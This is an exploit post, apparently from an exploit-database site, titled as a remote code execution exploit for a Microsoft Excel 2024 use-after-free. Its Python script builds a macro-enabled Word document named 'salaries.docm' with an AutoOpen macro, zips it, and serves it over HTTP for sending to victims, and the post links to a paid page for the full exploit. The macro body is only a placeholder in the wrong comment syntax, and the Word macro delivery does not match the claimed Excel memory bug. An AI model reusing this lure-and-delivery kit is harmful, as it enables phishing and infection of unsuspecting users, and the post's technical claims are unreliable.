# Exploit Title: Microsoft Excel 2024 Use after free - Remote Code Execution (RCE)
# Author: nu11secur1ty
# Date: 06/24/2025
# Vendor: Microsoft
# Software: https://www.microsoft.com/en/microsoft-365/excel?market=af
# Reference:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47165
# CVE: CVE-2025-47165
# Versions: Microsoft Office LTSC 2024 , Microsoft Office LTSC 2021,
Microsoft 365 Apps for Enterprise
# Description:
The attacker can trick any user into opening and executing their code by
sending a malicious DOCM file via email or a streaming server. After the
execution of the victim, his machine can be infected or even worse than
ever; this could be the end of his Windows machine! WARNING: AMPOTATE THE
MACROS OPTIONS FROM YOUR OFFICE 365!!!
#!/usr/bin/python
import os
import sys
import pythoncom
from win32com.client import Dispatch
import http.server
import socketserver
import socket
import threading
import zipfile
PORT = 8000
DOCM_FILENAME = "salaries.docm"
ZIP_FILENAME = "salaries.zip"
DIRECTORY = "."
def create_docm_with_macro(filename=DOCM_FILENAME):
pythoncom.CoInitialize()
word = Dispatch("Word.Application")
word.Visible = False
try:
doc = word.Documents.Add()
vb_project = doc.VBProject
vb_component = vb_project.VBComponents("ThisDocument")
macro_code = '''
Sub AutoOpen()
//YOUR EXPLOIT HERE
// All OF YPU PLEASE WATCH THE DEMO VIDEO
// Best Regards to packetstorm.news and OFFSEC
End Sub
'''
vb_component.CodeModule.AddFromString(macro_code)
doc.SaveAs(os.path.abspath(filename), FileFormat=13)
print(f"[+] Macro-enabled Word document created: {filename}")
except Exception as e:
print(f"[!] Error creating document: {e}")
finally:
doc.Close(False)
word.Quit()
pythoncom.CoUninitialize()
def zip_docm(docm_path, zip_path):
with zipfile.ZipFile(zip_path, 'w', compression=zipfile.ZIP_DEFLATED)
as zipf:
zipf.write(docm_path, arcname=os.path.basename(docm_path))
print(f"[+] Created ZIP archive: {zip_path}")
def get_local_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect(("8.8.8.8", 80))
ip = s.getsockname()[0]
except Exception:
ip = "127.0.0.1"
finally:
s.close()
return ip
class Handler(http.server.SimpleHTTPRequestHandler):
def __init__(self, *args, **kwargs):
super().__init__(*args, directory=DIRECTORY, **kwargs)
def run_server():
ip = get_local_ip()
print(f"[+] Starting HTTP server on http://{ip}:{PORT}")
print(f"[+] Place your macro docm and zip files in this directory to
serve them.")
print(f"[+] Access the ZIP file at: http://{ip}:{PORT}/{ZIP_FILENAME}")
with socketserver.TCPServer(("", PORT), Handler) as httpd:
print("[+] Server running, press Ctrl+C to stop")
httpd.serve_forever()
if __name__ == "__main__":
if os.name != "nt":
print("[!] This script only runs on Windows with MS Word
installed.")
sys.exit(1)
print("[*] Creating the macro-enabled document...")
create_docm_with_macro(DOCM_FILENAME)
print("[*] Creating ZIP archive of the document...")
zip_docm(DOCM_FILENAME, ZIP_FILENAME)
print("[*] Starting HTTP server in background thread...")
server_thread = threading.Thread(target=run_server, daemon=True)
server_thread.start()
try:
while True:
pass # Keep main thread alive
except KeyboardInterrupt:
print("\n[!] Server stopped by user.")
```
# Reproduce:
[href](https://www.youtube.com/watch?v=CSb76-OG-Tg)
# Buy an exploit only:
[href](https://satoshidisk.com/pay/COiBVA)
# Time spent:
01:37:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstorm.news/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty